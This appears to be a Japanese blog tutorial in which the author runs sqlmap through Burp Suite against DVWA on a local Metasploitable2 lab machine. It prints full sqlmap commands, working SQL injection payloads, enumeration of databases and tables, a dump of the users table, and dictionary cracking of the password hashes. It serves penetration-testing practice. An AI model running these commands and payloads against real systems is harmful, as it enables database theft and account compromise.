sqlmap

sqlmap: automatic SQL injection and database takeover tool

SQL Injection に特化したオープンソースの診断ツール。

Metasploitable2 Linux を起動

f:id:hirose-test:20191027221812j:plain

Kali Linux から BurpSuite を起動

root@kali:~# burpsuite

f:id:hirose-test:20191027213119j:plain

f:id:hirose-test:20191027213241j:plain

[Proxy] → [Options]から ローカルホスト(127.0.0.1)の8080ポートでの待ち受けを確認。 参考:以前の記事 Burp Suite

f:id:hirose-test:20191027215203j:plain

[Proxy] → [Intercept]を確認し、[Intercept is on] になっていたらクリックして [Intercept is off] に変更しておく。

ブラウザのプロキシ設定

ブラウザのプロキシ設定からローカルプロキシ(BurpSuite)との接続に変更する。 Kali のブラウザ(Firefox)の右上の [Open menu] → [Preferences] ページの一番下 [Network Proxy]を開く。

f:id:hirose-test:20191027220324j:plain

[Manual proxy configuration] を選択し、HTTP Proxy : 127.0.0.1 Port : 8080 を確認し「OK」をクリックして閉じる。[Preferences]画面も閉じる。

f:id:hirose-test:20191027220611j:plain

DVWA

DVWA の Security Level = low に設定。SQL Injecton ページを開く。
f:id:hirose-test:20191027221956j:plain

Unable to connect と出たら Proxy設定などが間違っている可能性がある。見直すこと。 f:id:hirose-test:20191027222029j:plain

BurpSuite の Intercept 設定を off から [intercept on] に変更。

ブラウザに戻り、User ID に1を入力して [submit] をクリック。通信は BurpSuiteに intercept されて止まるので画面は遷移しない。

f:id:hirose-test:20191027234956j:plain

BurpSuite に戻るとキャプチャされた通信が表示されている。sqlmap を使う際に Cookie の値が必要になるので、コピペして保存しておく。

f:id:hirose-test:20191027223958j:plain

f:id:hirose-test:20191027224010j:plain

保存したら [Foward] をクリックして、この通信は一旦流しておく。

f:id:hirose-test:20191027224308j:plain

通信が流れたのでデータが通常通り表示された。 f:id:hirose-test:20191027224325j:plain

[Intercept on] → [Intercept off] に変更してキャプチャも解除しておく。

f:id:hirose-test:20191027224522j:plain

sqlmap

新規ターミナルを開き、下記の通りコマンドを入力して実行(パラメータは自分の環境に合わせる)

root@kali:~# sqlmap -u "http://192.168.56.105/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --proxy="http://127.0.0.1:8080" --cookie="security=low; PHPSESSID=571e31e0458c5bdb45e6e63e001bfbf7" --dbs

f:id:hirose-test:20191028000716j:plain

所々で質問が出てくるので返答は Y(Yes)で。その後、しばし待つ。

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.3.10#stable}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:52:00 /2019-10-27/

[22:52:00] [INFO] testing connection to the target URL
[22:52:00] [INFO] checking if the target is protected by some kind of WAF/IPS
[22:52:00] [INFO] testing if the target URL content is stable
[22:52:01] [INFO] target URL content is stable
[22:52:01] [INFO] testing if GET parameter 'id' is dynamic
[22:52:01] [WARNING] GET parameter 'id' does not appear to be dynamic
[22:52:01] [INFO] heuristics detected web page charset 'ascii'
[22:52:01] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[22:52:01] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[22:52:01] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
 ~(中略)~
[23:05:38] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[23:05:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:05:52] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[23:06:04] [WARNING] GET parameter 'Submit' does not seem to be injectable
sqlmap identified the following injection point(s) with a total of 3290 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 5331=5331#&Submit=Submit

    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND ROW(8931,1249)>(SELECT COUNT(*),CONCAT(0x717a627871,(SELECT (ELT(8931=8931,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM (SELECT 6706 UNION SELECT 1852 UNION SELECT 1647 UNION SELECT 5861)a GROUP BY x)-- dPtg&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 1244 FROM (SELECT(SLEEP(5)))rLxE)-- hfJy&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a627871,0x764f557a54517648536376706a4a4b7441767955477347466868636b584371666d514e426c487a44,0x717a6b7171),NULL#&Submit=Submit
---
[23:06:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
[23:06:04] [INFO] fetching database names
available databases [7]:
[*] dvwa
[*] information_schema
[*] metasploit
[*] mysql
[*] owasp10
[*] tikiwiki
[*] tikiwiki195

[23:06:04] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.56.105'

[*] ending @ 23:06:04 /2019-10-27/

データベース一覧が表示された。

Google 翻訳

[!]法的免責事項:事前の相互同意なしにターゲットを攻撃するためのsqlmapの使用は違法です。適用されるすべての地方法、州法、および連邦法に従うことは、エンドユーザーの責任です。開発者は一切の責任を負わず、このプログラムによって引き起こされた誤用や損害について責任を負いません

[*] 22:52:00 / 2019-10-27 /から開始

[22:52:00] [情報] ターゲットURLへの接続をテストしています
[22:52:00] [情報] ターゲットが何らかのWAF / IPSによって保護されているかどうかを確認します
[22:52:00] [情報] ターゲットURLコンテンツが安定しているかどうかのテスト
[22:52:01] [情報] ターゲットURLコンテンツは安定しています
[22:52:01] [情報] GETパラメーター 'id'が動的かどうかのテスト
[22:52:01] [警告] GETパラメーター 'id'は動的ではないようです
[22:52:01] [情報] ヒューリスティックがWebページの文字セット「ascii」を検出しました
[22:52:01] [情報] ヒューリスティック(基本)テストでは、GETパラメーター 'id'が注入可能である可能性があることが示されています(可能性のあるDBMS: 'MySQL')
[22:52:01] [情報] ヒューリスティックXSS)テストは、GETパラメーター「id」がクロスサイトスクリプティングXSS)攻撃に対して脆弱である可能性があることを示しています
[22:52:01] [情報] GETパラメーター 'id'でのSQLインジェクションのテスト
バックエンドDBMSは「MySQL」のようです。他のDBMSに固有のテストペイロードをスキップしますか? [Y / n]
 
残りのテストでは、提供されたレベル(1)およびリスク(1)の値を拡張する「MySQL」のすべてのテストを含めますか? [Y / n]
 
ORブールベースのインジェクションの場合の[警告]、データ取得中に問題が発生した場合は、 '-drop-set-cookie'スイッチの使用を検討してください
GETパラメーター 'id'は脆弱です。他の(もしあれば)をテストし続けますか? [y / N]
 
少なくとも1つの他の(潜在的な)テクニックが見つからない場合は、基本的なUNIONテストのみを実行することをお勧めします。リクエストの数を減らしたいですか? [Y / n]

ヒューリスティクス - Wikipedia

DB dvwa のテーブルを調べる

表示されたDB一覧から一つ選び(dvwa)テーブルを調べてみる

root@kali:~# sqlmap -u "http://192.168.56.105/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --proxy="http://127.0.0.1:8080" --cookie="security=low; PHPSESSID=571e31e0458c5bdb45e6e63e001bfbf7" -D dvwa --tables
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.3.10#stable}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:25:27 /2019-10-27/

[23:25:27] [INFO] resuming back-end DBMS 'mysql' 
[23:25:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 5331=5331#&Submit=Submit

    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND ROW(8931,1249)>(SELECT COUNT(*),CONCAT(0x717a627871,(SELECT (ELT(8931=8931,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM (SELECT 6706 UNION SELECT 1852 UNION SELECT 1647 UNION SELECT 5861)a GROUP BY x)-- dPtg&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 1244 FROM (SELECT(SLEEP(5)))rLxE)-- hfJy&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a627871,0x764f557a54517648536376706a4a4b7441767955477347466868636b584371666d514e426c487a44,0x717a6b7171),NULL#&Submit=Submit
---
[23:25:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
[23:25:27] [INFO] fetching tables for database: 'dvwa'
[23:25:28] [WARNING] reflective value(s) found and filtering out
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[23:25:28] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.56.105'

[*] ending @ 23:25:28 /2019-10-27/

dvwa には [guestbook] [users]という二つのテーブルがあることが分かった。

テーブルのカラム名を調べる

[users]テーブルのカラム名を調べてみる

root@kali:~# sqlmap -u "http://192.168.56.105/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --proxy="http://127.0.0.1:8080" --cookie="security=low; PHPSESSID=571e31e0458c5bdb45e6e63e001bfbf7" -D dvwa -T users --columns
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.3.10#stable}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:33:14 /2019-10-27/

[23:33:14] [INFO] resuming back-end DBMS 'mysql' 
[23:33:14] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 5331=5331#&Submit=Submit

    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND ROW(8931,1249)>(SELECT COUNT(*),CONCAT(0x717a627871,(SELECT (ELT(8931=8931,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM (SELECT 6706 UNION SELECT 1852 UNION SELECT 1647 UNION SELECT 5861)a GROUP BY x)-- dPtg&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 1244 FROM (SELECT(SLEEP(5)))rLxE)-- hfJy&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a627871,0x764f557a54517648536376706a4a4b7441767955477347466868636b584371666d514e426c487a44,0x717a6b7171),NULL#&Submit=Submit
---
[23:33:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
[23:33:14] [INFO] fetching columns for table 'users' in database 'dvwa'
[23:33:14] [WARNING] reflective value(s) found and filtering out
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| user       | varchar(15) |
| avatar     | varchar(70) |
| first_name | varchar(15) |
| last_name  | varchar(15) |
| password   | varchar(32) |
| user_id    | int(6)      |
+------------+-------------+

[23:33:14] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.56.105'

[*] ending @ 23:33:14 /2019-10-27/

users テーブルのカラム名が表示された。

users と password をダンプしてみる

root@kali:~# sqlmap -u "http://192.168.56.105/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --proxy="http://127.0.0.1:8080" --cookie="security=low; PHPSESSID=571e31e0458c5bdb45e6e63e001bfbf7" -D dvwa -T users -C user,password --dump
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.3.10#stable}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:39:58 /2019-10-27/

[23:39:58] [INFO] resuming back-end DBMS 'mysql' 
[23:39:58] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 5331=5331#&Submit=Submit

    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND ROW(8931,1249)>(SELECT COUNT(*),CONCAT(0x717a627871,(SELECT (ELT(8931=8931,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM (SELECT 6706 UNION SELECT 1852 UNION SELECT 1647 UNION SELECT 5861)a GROUP BY x)-- dPtg&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 1244 FROM (SELECT(SLEEP(5)))rLxE)-- hfJy&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a627871,0x764f557a54517648536376706a4a4b7441767955477347466868636b584371666d514e426c487a44,0x717a6b7171),NULL#&Submit=Submit
---
[23:39:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
[23:39:59] [INFO] fetching entries of column(s) '`user`, password' for table 'users' in database 'dvwa'
[23:39:59] [INFO] heuristics detected web page charset 'ascii'
[23:39:59] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[23:39:59] [INFO] used SQL query returns 5 entries
[23:39:59] [INFO] resumed: '1337','8d3533d75ae2c3966d7e0d4fcc69216b'
[23:39:59] [INFO] resumed: 'admin','5f4dcc3b5aa765d61d8327deb882cf99'
[23:39:59] [INFO] resumed: 'gordonb','e99a18c428cb38d5f260853678922e03'
[23:39:59] [INFO] resumed: 'pablo','0d107d09f5bbe40cade3de5c71e9e9b7'
[23:39:59] [INFO] resumed: 'smithy','5f4dcc3b5aa765d61d8327deb882cf99'
[23:39:59] [INFO] recognized possible password hashes in column 'password'                                             
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[23:40:00] [INFO] writing hashes to a temporary file '/tmp/sqlmaphrU0aF2670/sqlmaphashes-X66Wfy.txt' 
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[23:40:02] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1 (←1を入力またはそのまま Enter)
[23:40:06] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[23:40:10] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[23:40:10] [INFO] starting 2 processes 
[23:40:15] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'                                
[23:40:15] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'                               
[23:40:22] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'                              
[23:40:27] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'                               
Database: dvwa                                                                                                         
Table: users
[5 entries]
+---------+---------------------------------------------+
| user    | password                                    |
+---------+---------------------------------------------+
| 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   |
| pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------+---------------------------------------------+

[23:40:36] [INFO] table 'dvwa.users' dumped to CSV file '/root/.sqlmap/output/192.168.56.105/dump/dvwa/users.csv'
[23:40:36] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.56.105'

[*] ending @ 23:40:36 /2019-10-27/

解析できた。

[23:39:59] [情報] 列 'password'で可能なパスワードハッシュを認識しました
ハッシュを一時ファイルに保存して、最終的に他のツールでさらに処理できるようにしますか [y / N]
 
[23:40:00] [情報] 一時ファイル '/tmp/sqlmaphrU0aF2670/sqlmaphashes-X66Wfy.txt'へのハッシュの書き込み辞書ベースの攻撃でそれらをクラックしたいですか? [Y / n / q]
 
[23:40:02] [情報] ハッシュメソッド 'md5_generic_passwd'を使用
 
どの辞書を使いたいですか?
[1] デフォルトの辞書ファイル '/usr/share/sqlmap/data/txt/wordlist.tx_'(Enterキーを押します)
[2] カスタム辞書ファイル
[3] 辞書ファイルのリストを含むファイル
 
[23:40:06] [情報]デフォルト辞書を使用
一般的なパスワードサフィックスを使用しますか? (遅い!)[y / N]

プロキシ設定を「No proxy」に戻しておく。

f:id:hirose-test:20191103230633j:plain

/* -----codeの行番号----- */